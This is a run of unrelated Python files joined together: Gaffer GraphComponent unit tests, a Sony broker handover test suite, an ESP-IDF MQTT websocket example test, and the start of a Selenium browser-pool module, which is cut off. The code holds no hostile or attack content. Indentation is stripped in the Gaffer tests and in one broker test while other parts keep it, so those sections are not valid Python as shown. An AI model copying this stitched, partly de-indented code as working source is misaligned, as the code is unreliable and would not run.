self.assertEqual( g[0].getName(), "a" )
self.assertEqual( g[1].getName(), "b" )
self.assertEqual( g[2].getName(), "c" )
self.assertEqual( g[-1].getName(), "c" )
self.assertEqual( g[-2].getName(), "b" )
self.assertEqual( g[-3].getName(), "a" )
def testChildrenByType( self ) :
g = Gaffer.Node()
g["a"] = Gaffer.IntPlug()
g["b"] = Gaffer.Plug()
g["c"] = Gaffer.Node()
self.assertEqual( len( g.children() ), 4 )
self.assertEqual( len( g.children( Gaffer.GraphComponent ) ), 4 )
self.assertEqual( len( g.children( Gaffer.Plug ) ), 3 )
self.assertEqual( len( g.children( Gaffer.Node ) ), 1 )
self.assertEqual( len( g.children( Gaffer.IntPlug ) ), 1 )
def testRemoveMany( self ) :
g = Gaffer.GraphComponent()
l = []
for i in range( 0, 10000 ) :
c = Gaffer.GraphComponent()
l.append( c )
g["c%d"%i] = c
for c in l :
g.removeChild( c )
def testManyChildrenWithSameInitialName( self ) :
g = Gaffer.GraphComponent()
for i in range( 0, 2000 ) :
g.addChild( Gaffer.GraphComponent() )
for index, child in enumerate( g ) :
if index == 0 :
self.assertEqual( child.getName(), "GraphComponent" )
else :
self.assertEqual( child.getName(), "GraphComponent%d" % index )
def testNamesWithStrangeSuffixes( self ) :
g = Gaffer.GraphComponent()
g.addChild( Gaffer.GraphComponent( "a" ) )
g.addChild( Gaffer.GraphComponent( "a1somethingElse" ) )
self.assertEqual( g[0].getName(), "a" )
self.assertEqual( g[1].getName(), "a1somethingElse" )
g.addChild( Gaffer.GraphComponent( "a" ) )
self.assertEqual( g[2].getName(), "a1" )
def testAddChildWithExistingNumericSuffix( self ) :
g = Gaffer.GraphComponent()
g.addChild( Gaffer.GraphComponent( "a1" ) )
g.addChild( Gaffer.GraphComponent( "a1" ) )
self.assertEqual( g[0].getName(), "a1" )
self.assertEqual( g[1].getName(), "a2" )
def testSetChildDoesntRemoveChildIfNewChildIsntAccepted( self ) :
class AddNodeAcceptor( Gaffer.Node ) :
def __init__( self, name = "AddNodeAcceptor" ) :
Gaffer.Node.__init__( self, name )
def acceptsChild( self, potentialChild ) :
return isinstance( potentialChild, GafferTest.AddNode )
IECore.registerRunTimeTyped( AddNodeAcceptor )
g = AddNodeAcceptor()
a = GafferTest.AddNode()
g["a"] = a
self.assertRaises( RuntimeError, g.setChild, "a", GafferTest.MultiplyNode() )
self.assertTrue( g["a"].isSame( a ) )
def testCircularParentingThrows( self ) :
a = Gaffer.GraphComponent()
b = Gaffer.GraphComponent()
a["b"] = b
self.assertRaises( RuntimeError, b.addChild, a )
a = Gaffer.GraphComponent()
b = Gaffer.GraphComponent()
c = Gaffer.GraphComponent()
a["b"] = b
b["c"] = c
self.assertRaises( RuntimeError, c.addChild, a )
a = Gaffer.GraphComponent()
self.assertRaises( RuntimeError, a.addChild, a )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed(
Gaffer,
# Ignore the names imported from GafferCortex and
# GafferDispatch into the Gaffer namespace - they're
# just for backwards compatibility.
namesToIgnore = set( [
"GafferCortex::ObjectReader",
"GafferCortex::ObjectWriter",
"GafferCortex::ExecutableOpHolder",
"GafferCortex::OpHolder",
"GafferCortex::ParameterisedHolderNode",
"GafferCortex::ParameterisedHolderDependencyNode",
"GafferCortex::ParameterisedHolderComputeNode",
"GafferCortex::ParameterisedHolderTaskNode",
"GafferCortex::AttributeCachePath",
"GafferCortex::ClassLoaderPath",
"GafferCortex::IndexedIOPath",
"GafferCortex::ParameterPath",
"GafferDispatch::Dispatcher",
"GafferDispatch::LocalDispatcher",
"GafferDispatch::TaskNode",
"GafferDispatch::PythonCommand",
"GafferDispatch::SystemCommand",
"GafferDispatch::TaskContextProcessor",
"GafferDispatch::TaskContextVariables",
"GafferDispatch::TaskList",
"GafferDispatch::TaskSwitch",
"GafferDispatch::Wedge",
"GafferDispatch::FrameMask",
] )
)
self.assertTypeNamesArePrefixed( GafferTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( Gaffer )
self.assertDefaultNamesAreCorrect( GafferTest )
def testClearChildren( self ) :
p = Gaffer.GraphComponent()
for i in range( 0, 10 ) :
p.addChild( Gaffer.GraphComponent() )
self.assertEqual( len( p ), 10 )
p.clearChildren()
self.assertEqual( len( p ), 0 )
def testParentChanging( self ) :
class Child( Gaffer.GraphComponent ) :
def __init__( self, name = "Child" ) :
Gaffer.GraphComponent.__init__( self, name )
self.parentChanges = []
def _parentChanging( self, newParent ) :
self.parentChanges.append( ( self.parent(), newParent ) )
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Child()
self.assertEqual( len( c.parentChanges ), 0 )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p1.removeChild( c )
self.assertEqual( len( c.parentChanges ), 2 )
self.assertEqual( c.parentChanges[-1], ( p1, None ) )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 3 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p2.addChild( c )
self.assertEqual( len( c.parentChanges ), 4 )
self.assertEqual( c.parentChanges[-1], ( p1, p2 ) )
# cause a parent change by destroying the parent.
# we need to remove all references to the parent to do
# this, including those stored in the parentChanges list.
del p2
del c.parentChanges[:]
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, None ) )
def testDescriptiveKeyErrors( self ) :
g = Gaffer.GraphComponent()
self.assertRaisesRegexp( KeyError, "'a' is not a child of 'GraphComponent'", g.__getitem__, "a" )
self.assertRaisesRegexp( KeyError, "'a' is not a child of 'GraphComponent'", g.__delitem__, "a" )
def testNoneIsNotAString( self ) :
g = Gaffer.GraphComponent()
self.assertRaises( TypeError, g.getChild, None )
self.assertRaises( TypeError, g.__getitem__, None )
self.assertRaises( TypeError, g.__delitem__, None )
self.assertRaises( TypeError, g.descendant, None )
self.assertRaises( TypeError, g.__contains__, None )
self.assertRaises( TypeError, g.setName, None )
def testDelItemByIndex( self ) :
g = Gaffer.GraphComponent()
a = Gaffer.GraphComponent( "a" )
b = Gaffer.GraphComponent( "b" )
g["a"] = a
g["b"] = b
self.assertEqual( a.parent(), g )
self.assertEqual( b.parent(), g )
del g[0]
self.assertEqual( a.parent(), None )
self.assertEqual( b.parent(), g )
def testRemoveChildUndoIndices( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
a = Gaffer.Plug( "a" )
b = Gaffer.Plug( "b" )
c = Gaffer.Plug( "c" )
s["n"]["user"].addChild( a )
s["n"]["user"].addChild( b )
s["n"]["user"].addChild( c )
def assertPreconditions() :
self.assertEqual( len( s["n"]["user"] ), 3 )
self.assertEqual( s["n"]["user"][0], a )
self.assertEqual( s["n"]["user"][1], b )
self.assertEqual( s["n"]["user"][2], c )
assertPreconditions()
with Gaffer.UndoScope( s ) :
del s["n"]["user"]["b"]
def assertPostConditions() :
self.assertEqual( len( s["n"]["user"] ), 2 )
self.assertEqual( s["n"]["user"][0], a )
self.assertEqual( s["n"]["user"][1], c )
assertPostConditions()
s.undo()
assertPreconditions()
s.redo()
assertPostConditions()
s.undo()
assertPreconditions()
def testMoveChildUndoIndices( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
s["n2"] = Gaffer.Node()
a = Gaffer.Plug( "a" )
b = Gaffer.Plug( "b" )
c = Gaffer.Plug( "c" )
s["n1"]["user"].addChild( a )
s["n1"]["user"].addChild( b )
s["n1"]["user"].addChild( c )
def assertPreconditions() :
self.assertEqual( len( s["n1"]["user"] ), 3 )
self.assertEqual( s["n1"]["user"][0], a )
self.assertEqual( s["n1"]["user"][1], b )
self.assertEqual( s["n1"]["user"][2], c )
self.assertEqual( len( s["n2"]["user"] ), 0 )
assertPreconditions()
with Gaffer.UndoScope( s ) :
s["n2"]["user"].addChild( s["n1"]["user"]["b"] )
def assertPostConditions() :
self.assertEqual( len( s["n1"]["user"] ), 2 )
self.assertEqual( s["n1"]["user"][0], a )
self.assertEqual( s["n1"]["user"][1], c )
self.assertEqual( len( s["n2"]["user"] ), 1 )
self.assertEqual( s["n2"]["user"][0], b )
assertPostConditions()
s.undo()
assertPreconditions()
s.redo()
assertPostConditions()
s.undo()
assertPreconditions()
def testParentChangedOverride( self ) :
class Child( Gaffer.GraphComponent ) :
def __init__( self, name = "Child" ) :
Gaffer.GraphComponent.__init__( self, name )
self.parentChanges = []
def _parentChanged( self, oldParent ) :
self.parentChanges.append( ( oldParent, self.parent() ) )
p1 = Gaffer.GraphComponent()
p2 = Gaffer.GraphComponent()
c = Child()
self.assertEqual( len( c.parentChanges ), 0 )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p1.removeChild( c )
self.assertEqual( len( c.parentChanges ), 2 )
self.assertEqual( c.parentChanges[-1], ( p1, None ) )
p1.addChild( c )
self.assertEqual( len( c.parentChanges ), 3 )
self.assertEqual( c.parentChanges[-1], ( None, p1 ) )
p2.addChild( c )
self.assertEqual( len( c.parentChanges ), 4 )
self.assertEqual( c.parentChanges[-1], ( p1, p2 ) )
# Cause a parent change by destroying the parent.
# We need to remove all references to the parent to do
# this, including those stored in the parentChanges list.
del p2
del c.parentChanges[:]
self.assertEqual( len( c.parentChanges ), 1 )
self.assertEqual( c.parentChanges[-1], ( None, None ) )
@GafferTest.TestRunner.PerformanceTestMethod()
def testMakeNamesUnique( self ) :
s = Gaffer.ScriptNode()
for i in range( 0, 1000 ) :
n = GafferTest.AddNode()
s.addChild( n )
@GafferTest.TestRunner.PerformanceTestMethod()
def testGetChild( self ) :
s = Gaffer.ScriptNode()
for i in range( 0, 1000 ) :
# explicitly setting the name to something unique
# avoids the overhead incurred by the example
# in testMakeNamesUnique
n = GafferTest.AddNode( "AddNode" + str( i ) )
s.addChild( n )
for i in range( 0, 1000 ) :
n = "AddNode" + str( i )
c = s[n]
self.assertEqual( c.getName(), n )
def testNoneIsNotAGraphComponent( self ) :
g = Gaffer.GraphComponent()
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.addChild( None )
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.setChild( "x", None )
with self.assertRaisesRegexp( Exception, r"did not match C\+\+ signature" ) :
g.removeChild( None )
def testRanges( self ) :
g = Gaffer.GraphComponent()
g["c1"] = Gaffer.GraphComponent()
g["c2"] = Gaffer.GraphComponent()
g["c2"]["gc1"] = Gaffer.GraphComponent()
g["c3"] = Gaffer.GraphComponent()
g["c3"]["gc2"] = Gaffer.GraphComponent()
g["c3"]["gc3"] = Gaffer.GraphComponent()
self.assertEqual(
list( Gaffer.GraphComponent.Range( g ) ),
[ g["c1"], g["c2"], g["c3"] ],
)
self.assertEqual(
list( Gaffer.GraphComponent.RecursiveRange( g ) ),
[ g["c1"], g["c2"], g["c2"]["gc1"], g["c3"], g["c3"]["gc2"], g["c3"]["gc3"] ],
)
if __name__ == "__main__":
unittest.main()
|
handover.py | # Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import json
import time
import traceback
from ave.network.process import Process
from ave.network.exceptions import *
from ave.broker._broker import validate_serialized, RemoteBroker, Broker
from ave.broker.session import RemoteSession
from ave.broker.exceptions import *
import setup
# check that a broker with trivial allocations can have its state serialized
@setup.brokers([],'master',[],False,False)
def t1(HOME, master):
    # check that a broker with trivial (no) allocations can have its state
    # serialized, and that the serialized form validates for adoption
    pretty = '%s t1' % __file__
    print(pretty)
    try:
        s = master.serialize()
    except Exception, e:
        print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
        return False
    try:
        validate_serialized(s)
    except Exception, e:
        print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
        return False
    return True
# like t1 but with some allocations
@setup.brokers([],'master',[],False,False)
def t2(HOME, master):
    # like t1 but serialize while two clients hold live allocations
    pretty = '%s t2' % __file__
    print(pretty)
    c1 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
    c1.get_resources({'type':'handset'}, {'type':'workspace'})
    c2 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
    c2.get_resources({'type':'handset'}, {'type':'relay'})
    try:
        s = master.serialize()
    except Exception, e:
        print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
        return False
    try:
        validate_serialized(s)
    except Exception, e:
        print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
        return False
    return True
# trivial handover between two brokers: no allocations. more or less just check
# that the takeover can be started on the same port as the handover and that
# configuration data is the same
@setup.factory()
def t3(factory):
    # trivial handover between two brokers: no allocations. more or less just
    # check that the takeover can be started on the same port as the handover
    # and that configuration data is the same
    pretty = '%s t3' % __file__
    print(pretty)
    handover = factory.make_master('master')
    adoption,config,fdtx_path = handover.begin_handover() # stops listening
    try:
        takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    except Exception, e:
        print('FAIL %s: could not start takeover: %s' % (pretty, str(e)))
        return False
    try:
        handover.end_handover(1)
    except ConnectionClosed:
        pass # expected: the handover drops its RPC connections
    except Exception, e:
        print('FAIL %s: unexpected error: %s' % (pretty, str(e)))
        return False
    # compare the config and serialization of the two
    c = takeover.get_config()
    if c != config:
        print('FAIL %s: configuration mismatch: %s != %s' % (pretty, c, config))
        return False
    return True
# make a few allocations, then handover. check that both brokers show the same
# availability of equipment
@setup.factory()
def t4(factory):
    # make a few allocations, then handover. check that both brokers show the
    # same availability of equipment
    pretty = '%s t4' % __file__
    print(pretty)
    handover = factory.make_master('master')
    avail_1 = handover.list_available()
    # make some allocations
    c1 = RemoteBroker(handover.address, home=factory.HOME.path)
    h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
    avail_2 = handover.list_available()
    c2 = RemoteBroker(handover.address, home=factory.HOME.path)
    h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
    avail_3 = handover.list_available()
    # hand over
    adoption,config,fdtx_path = handover.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    # check that availability is correct. stop the sessions started against
    # the handover and check that the resources become available in the
    # takeover
    result = takeover.list_available()
    if len(result) != len(avail_3):
        print('FAIL %s: wrong avail 3: %s != %s' % (pretty, result, avail_3))
        return False
    ok = False
    del(c2)
    for i in range(10): # allow some time for brokers to detect session death
        result = takeover.list_available()
        if len(result) == len(avail_2):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        print('FAIL %s: wrong avail 2: %s != %s' % (pretty, result, avail_2))
        return False
    ok = False
    del(c1)
    for i in range(10): # allow some time for brokers to detect session death
        result = takeover.list_available()
        if len(result) == len(avail_1):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        # bug fix: report against avail_1 here (the original printed avail_2)
        print('FAIL %s: wrong avail 1: %s != %s' % (pretty, result, avail_1))
        return False
    return True
# kill off one of the original sessions during the handover and check that the
# associated resources become available in the takeover
@setup.factory()
def t5(factory):
    # kill off one of the original sessions during the handover and check
    # that the associated resources become available in the takeover
    pretty = '%s t5' % __file__
    print(pretty)
    handover = factory.make_master('master')
    avail_1 = handover.list_available()
    # make some allocations
    c1 = RemoteBroker(handover.address, home=factory.HOME.path)
    h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
    avail_2 = handover.list_available()
    c2 = RemoteBroker(handover.address, home=factory.HOME.path)
    h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
    avail_3 = handover.list_available()
    adoption,config,fdtx_path = handover.begin_handover()
    session = RemoteSession(h2.address, h2.authkey)
    try:
        session.crash() # kill the second session during the handover
    except ConnectionClosed:
        pass # expected: the session dies mid-call
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    result = takeover.list_available()
    if len(result) != len(avail_2):
        print('FAIL %s: wrong avail: %s != %s' % (pretty, result, avail_2))
        return False
    return True
# make sure one of the sessions is super busy during the handover so that it
# cannot engage in communication with the takeover during session adoption
@setup.factory()
def t6(factory):
    # make sure one of the sessions is super busy during the handover so that
    # it cannot engage in communication with the takeover during adoption
    pretty = '%s t6' % __file__
    print(pretty)
    handover = factory.make_master('master')
    avail = handover.list_available()
    def oob_client(address):
        r = RemoteBroker(address, home=factory.HOME.path)
        h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
        w.run('sleep 3') # right, extremely busy, but it prevents other action
        while True:
            time.sleep(1) # don't let client die and loose all resources
    p = Process(target=oob_client, args=(handover.address,))
    p.start()
    # make sure the oob client has gotten its resources
    ok = False
    for i in range(10):
        if len(handover.list_available()) != len(avail):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        # bug fix: the original only printed here and fell through into the
        # handover anyway; terminate the client and fail, like t7/t8 do
        print('FAIL %s: catastrophic' % pretty)
        p.terminate()
        p.join()
        return False
    adoption,config,fdtx_path = handover.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    result = True
    if len(takeover.list_available()) == len(avail):
        print('FAIL %s: wrong avail: %s' % (pretty, avail))
        result = False
    p.terminate()
    p.join()
    return result
# check that resources of super busy sessions are reclaimed when the session
# finally dies
@setup.factory()
def t7(factory):
    # check that resources of super busy sessions are reclaimed when the
    # session finally dies
    pretty = '%s t7' % __file__
    print(pretty)
    handover = factory.make_master('master')
    avail = handover.list_available()
    def oob_client(address):
        # unlike t6, this client exits after its busy work, so its session
        # dies on its own
        r = RemoteBroker(address, home=factory.HOME.path)
        h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
        w.run('sleep 2') # right, extremely busy, but it prevents other action
    p = Process(target=oob_client, args=(handover.address,))
    p.start()
    # make sure the oob client has gotten its resources
    ok = False
    for i in range(10):
        if len(handover.list_available()) != len(avail):
            ok = True
            break
        time.sleep(0.1)
    if not ok:
        print('FAIL %s: catastrophic' % pretty)
        p.terminate()
        p.join()
        return False
    adoption,config,fdtx_path = handover.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    # now wait for the client to die, so that its session dies, so that
    # the takeover detects this, so that the associated resouces can be
    # reclaimed, so that the takeover's availability is the same as when we
    # started
    ok = False
    for i in range(10):
        if len(takeover.list_available()) == len(avail):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        print('FAIL %s: super busy session not tracked correctly' % pretty)
    p.terminate()
    p.join()
    return ok
# check that sessions survive multiple broker restarts
@setup.factory()
def t8(factory):
pretty = '%s t8' % __file__
print(pretty)
original = factory.make_master('master')
avail = original.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
while True:
time.sleep(1)
p = Process(target=oob_client, args=(original.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(original.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
# do two handovers in a row
adoption,config,fdtx_path = original.begin_handover()
interim = factory.make_takeover('master', adoption, config, fdtx_path)
original.end_handover(1)
adoption,config,fdtx_path = interim.begin_handover()
final = factory.make_takeover('master', adoption, config, fdtx_path)
interim.end_handover(1)
# check that all brokers have the same availability
a1 = original.list_available()
a2 = interim.list_available()
a3 = final.list_available()
if len(a1) != len(a2) != len(a3):
print(
'FAIL %s: a handover failed somewhere: %s != %s != %s'
% (pretty, a1, a2, a3)
)
p.terminate()
p.join()
return False
# kill the client so that the brokers reclaim the equipment
p.terminate()
p.join()
ok = False
for i in range(10):
a3 = final.list_available()
if len(a3) == len(avail):
ok = True
break
if not ok:
print(
'FAIL %s: wrong availability: %d %d %d %d'
% (pretty, len(a1), len(a2), len(a3), len(avail))
)
return False
# check that the original and interim brokers have terminated now that they
# don't have any sessions with allocations
try:
original.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
interim.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that clients still attached to the handover get Restarting exceptions
# when they try to allocate after the handover has been done. this *can* be
# fixed so that clients migrate automatically, but it is difficult and I would
# prefer to not implement it unless there a strong case can be made for it
@setup.factory()
def t9(factory):
    # check that clients still attached to the handover get Restarting
    # exceptions when they try to allocate after the handover has been done.
    # this *can* be fixed so that clients migrate automatically, but it is
    # difficult; don't implement unless a strong case can be made for it
    pretty = '%s t9' % __file__
    print(pretty)
    handover = factory.make_master('master')
    client = RemoteBroker(handover.address, home=factory.HOME.path)
    # make first allocation
    h,w = client.get_resources({'type':'handset'}, {'type':'workspace'})
    # hand over
    adoption,config,fdtx_path = handover.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    # make second allocation
    try:
        client.get({'type':'handset'})
        print('FAIL %s: second allocation did not fail' % pretty)
        return False
    except Restarting:
        pass # good
    except Exception, e:
        print('FAIL %s: wrong exception: %s' % (pretty, e))
        return False
    return True
# check that a restarted share shows up again in its master
@setup.factory()
def t10(factory):
    # check that a restarted share shows up again in its master
    pretty = '%s t10' % __file__
    print(pretty)
    master = factory.make_master('master')
    share = factory.make_share(master, 'share')
    share.start_sharing()
    time.sleep(1) # give the share time to register with the master
    client = RemoteBroker(address=master.address, home=factory.HOME.path)
    h = client.get_resources({'type':'handset', 'serial':'share-1'})
    a1 = master.list_available()
    # restart the share
    adoption,config,fdtx_path = share.begin_handover()
    takeover = factory.make_takeover('share', adoption, config, fdtx_path)
    a2 = master.list_available()
    if len(a1) == len(a2):
        print('FAIL %s: shared resources still visible: %s' % (pretty, a2))
        return False
    # finish the handover so that takeover can start accepting RPC's. then
    # check that the master sees all equipment except the one allocated
    share.end_handover(1)
    ok = False
    for i in range(10):
        a3 = master.list_available()
        if len(a3) == len(a1):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        print('FAIL %s: wrong availability: %s' % (pretty, a3))
        return False
    for profile in a3:
        if 'serial' in profile and profile['serial'] == 'share-1':
            print('FAIL %s: busy equipment shared' % pretty)
            return False
    # finally check that the resource can still be manipulated
    try:
        p = h.get_profile()
        if p['serial'] != 'share-1':
            print('FAIL %s: wrong profile: %s' % (pretty, p))
            return False
    except Exception, e:
        print('FAIL %s: unexpected error: %s' % (pretty, e))
        return False
    return True
# check that shares reconnect to a restarted master
@setup.factory()
def t11(factory):
    # check that shares reconnect to a restarted master
    pretty = '%s t11' % __file__
    print(pretty)
    master = factory.make_master('master')
    share = factory.make_share(master, 'share')
    share.start_sharing()
    time.sleep(1) # give the share time to register with the master
    client = RemoteBroker(address=master.address, home=factory.HOME.path)
    h1 = client.get_resources({'type':'handset', 'serial':'share-1'})
    h2 = client.get_resources({'type':'handset', 'serial':'master-1'})
    a1 = master.list_available()
    # restart the master
    adoption,config,fdtx_path = master.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    master.end_handover(1)
    # connect to the new master and check the availability again
    master = RemoteBroker(address=master.address, home=factory.HOME.path)
    ok = False
    for i in range(10):
        a2 = master.list_available()
        if len(a2) == len(a1):
            ok = True
            break
        time.sleep(0.3)
    if not ok:
        print('FAIL %s: wrong availability: %s' % (pretty, a2))
        return False
    for profile in a2:
        if 'serial' in profile and profile['serial'] == 'share-1':
            print('FAIL %s: busy equipment shared' % pretty)
            return False
    return True
# check that .end_handover() doesn't time out even if the takeover did not get
# any sessions to adopt. regression test
@setup.factory()
def t12(factory):
    # check that .end_handover() doesn't time out even if the takeover did
    # not get any sessions to adopt. regression test
    pretty = '%s t12' % __file__
    print(pretty)
    master = factory.make_master('master')
    adoption,config,fdtx_path = master.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    try:
        master.end_handover(1)
    except ConnectionClosed:
        pass # acceptable: the old broker may drop the connection
    except Exception, e:
        print('FAIL %s: unexpected error: %s' % (pretty, e))
        return False
    return True
# check that the handover exits when the last session terminates
@setup.factory()
def t13(factory):
    # check that the handover exits when the last session terminates
    pretty = '%s t13' % __file__
    print(pretty)
    handover = factory.make_master('master')
    # make some sessions
    c1 = RemoteBroker(handover.address, home=factory.HOME.path)
    h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
    avail_2 = handover.list_available()
    c2 = RemoteBroker(handover.address, home=factory.HOME.path)
    h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
    avail_3 = handover.list_available()
    adoption,config,fdtx_path = handover.begin_handover()
    takeover = factory.make_takeover('master', adoption, config, fdtx_path)
    handover.end_handover(1)
    # crash the sessions
    session = RemoteSession(h1.address, h1.authkey)
    try:
        session.crash()
    except ConnectionClosed:
        pass # expected: the session dies mid-call
    session = RemoteSession(h2.address, h2.authkey)
    try:
        session.crash()
    except ConnectionClosed:
        pass # expected: the session dies mid-call
    for i in range(10): # wait until only one session remains, then close it
        authkeys = handover.get_session_authkeys()
        if len(authkeys) == 1:
            break
        time.sleep(0.3)
    # check that the handover sends its exit message when the last session
    # is closed
    try:
        handover.close_session(authkeys[0])
    except Exit, e:
        if str(e) != 'broker restarted. please reconnect':
            print('FAIL %s: wrong exit message: %s' % (pretty, str(e)))
            return False
    except Exception, e:
        print('FAIL %s: wrong exception: %s' % (pretty, e))
        return False
    try:
        handover.ping() # ping
    except ConnectionClosed:
        pass # good
    except Exception, e:
        print('FAIL %s: wrong exception: %s' % (pretty, e))
        return False
    return True
|
mqtt_ws_example_test.py | from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except Exception:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
    print("Connected with result code " + str(rc))
    # signal the test that the broker connection is up, then subscribe to
    # the topic the ESP32 example publishes on
    event_client_connected.set()
    client.subscribe("/topic/qos0")
def mqtt_client_task(client):
    # Pump the MQTT network loop until the test signals shutdown via
    # event_stop_client.
    while not event_stop_client.is_set():
        client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    global message_log
    payload = msg.payload.decode()
    # first matching "data" message: answer the ESP32 so it can verify
    # reception on its side
    if not event_client_received_correct.is_set() and payload == "data":
        client.publish("/topic/qos0", "data_to_esp32")
    if msg.topic == "/topic/qos0" and payload == "data":
        event_client_received_correct.set()
    # keep a log of everything received for failure diagnostics
    message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
    broker_url = ""
    broker_port = 0
    """
    steps: |
      1. join AP and connects to ws broker
      2. Test connects a client to the same broker
      3. Test evaluates it received correct qos0 message
      4. Test ESP32 client received correct qos0 message
    """
    dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws")
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
    bin_size = os.path.getsize(binary_file)
    IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
    IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
    # Look for host:port in sdkconfig
    try:
        value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
        broker_url = value.group(1)
        broker_port = int(value.group(2))
    except Exception:
        print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
        raise
    client = None
    # 1. Test connects to a broker
    try:
        client = mqtt.Client(transport="websockets")
        client.on_connect = on_connect
        client.on_message = on_message
        print("Connecting...")
        client.connect(broker_url, broker_port, 60)
    except Exception:
        print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
        raise
    # Starting a py-client in a separate thread
    thread1 = Thread(target=mqtt_client_task, args=(client,))
    thread1.start()
    try:
        print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
        if not event_client_connected.wait(timeout=30):
            raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
        dut1.start_app()
        try:
            ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
            print("Connected to AP with IP: {}".format(ip_address))
        except DUT.ExpectTimeout:
            print('ENV_TEST_FAILURE: Cannot connect to AP')
            raise
        print("Checking py-client received msg published from esp...")
        if not event_client_received_correct.wait(timeout=30):
            raise ValueError('Wrong data received, msg log: {}'.format(message_log))
        print("Checking esp-client received msg published from py-client...")
        dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
    finally:
        # always stop the background py-client loop, even on failure
        event_stop_client.set()
        thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
browser_pool.py | import threading
import time
from queue import Queue, Empty
import psutil as psutil
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
'''
* -------------------------------------------------
* * Browser_Pool
* @discribe : Browser Pool
*
* @author : Ma Xuefeng
* @date : 2018/3/28
* -------------------------------------------------
'''
#============= Object ======================
browser_pool = None # Browser Pool Object
#============= Config ======================
browser_amount = 0 # If browser_amount <= 0 , means unlimit, then lazy_load must be True
minimize = False
memory_rate = 90
lazy_load = True
log_silence = True # 输出安静
#== Option Config ==
load_picture = False
head_less = False
#=======================================
# Build a shared Options object only when some option deviates from the
